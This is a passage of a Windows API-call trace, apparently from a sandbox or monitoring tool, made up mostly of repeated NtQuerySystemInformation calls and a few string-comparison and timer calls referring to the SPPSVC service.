(SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0281.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x20, ResultLength=0x0) [0281.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0281.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0281.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0281.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0281.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x20, ResultLength=0x0) [0281.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0281.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0281.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd070, Length=0x50, ResultLength=0x0) [0281.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd070, Length=0x50, ResultLength=0x0) [0281.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd070, Length=0x50, ResultLength=0x0) [0281.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf60, Length=0x50, ResultLength=0x0) [0281.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf60, Length=0x50, ResultLength=0x0) [0281.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf60, Length=0x50, ResultLength=0x0) [0281.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf60, Length=0x50, ResultLength=0x0) [0281.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce90, Length=0x38, ResultLength=0x0) [0281.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x28, ResultLength=0x0) [0281.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x28, ResultLength=0x0) [0281.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x28, ResultLength=0x0) [0281.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x28, ResultLength=0x0) [0281.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd30, Length=0x28, ResultLength=0x0) [0281.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce90, Length=0x38, ResultLength=0x0) [0281.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdb0, Length=0x28, ResultLength=0x0) [0281.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdb0, Length=0x28, ResultLength=0x0) [0281.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x20, ResultLength=0x0) [0281.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x20, ResultLength=0x0) [0281.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x20, ResultLength=0x0) [0281.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x20, ResultLength=0x0) [0281.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce90, Length=0x38, ResultLength=0x0) [0281.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce90, Length=0x38, ResultLength=0x0) [0281.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd10, Length=0x20, ResultLength=0x0) [0281.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x20, ResultLength=0x0) [0281.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x20, ResultLength=0x0) [0281.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x50, ResultLength=0x0) [0281.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x28, ResultLength=0x0) [0281.646] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0281.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x50, ResultLength=0x0) [0281.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x50, ResultLength=0x0) [0281.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcef0, Length=0x50, ResultLength=0x0) [0281.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce70, Length=0x28, ResultLength=0x0) [0281.646] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0281.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcef0, Length=0x50, ResultLength=0x0) [0281.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcef0, Length=0x50, ResultLength=0x0) [0281.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcef0, Length=0x50, ResultLength=0x0) [0281.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x38, ResultLength=0x0) [0281.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x28, ResultLength=0x0) [0281.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x28, ResultLength=0x0) [0281.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x28, ResultLength=0x0) [0281.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x28, ResultLength=0x0) [0281.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x38, ResultLength=0x0) [0281.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x28, ResultLength=0x0) [0281.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x28, ResultLength=0x0) [0281.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x38, ResultLength=0x0) [0281.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x20, ResultLength=0x0) [0281.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x20, ResultLength=0x0) [0281.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x20, ResultLength=0x0) [0281.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x20, ResultLength=0x0) [0281.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x38, ResultLength=0x0) [0281.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x20, ResultLength=0x0) [0281.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x20, ResultLength=0x0) [0281.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x20, ResultLength=0x0) [0281.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.656] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf7a68fcf50 | out: lpSystemTimeAsFileTime=0xf7a68fcf50*(dwLowDateTime=0x3a3fb3b2, dwHighDateTime=0x1d63874)) [0281.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x50, ResultLength=0x0) [0281.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf40, Length=0x28, ResultLength=0x0) [0281.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x50, ResultLength=0x0) [0281.657] GetTickCount () returned 0x118683d [0281.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd28, Length=0x58, ResultLength=0x0) [0281.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x38, ResultLength=0x0) [0281.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca70, Length=0x28, ResultLength=0x0) [0281.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca70, Length=0x28, ResultLength=0x0) [0281.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca70, Length=0x28, ResultLength=0x0) [0281.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca70, Length=0x28, ResultLength=0x0) [0281.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcae0, Length=0x28, ResultLength=0x0) [0281.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x38, ResultLength=0x0) [0281.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x28, ResultLength=0x0) [0281.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x28, ResultLength=0x0) [0281.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x38, ResultLength=0x0) [0281.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x20, ResultLength=0x0) [0281.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0281.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0281.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0281.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x38, ResultLength=0x0) [0281.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x20, ResultLength=0x0) [0281.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0281.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0281.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd28, Length=0x58, ResultLength=0x0) [0281.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0281.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x28, ResultLength=0x0) [0281.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x28, ResultLength=0x0) [0281.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x28, ResultLength=0x0) [0281.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x28, ResultLength=0x0) [0281.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x28, ResultLength=0x0) 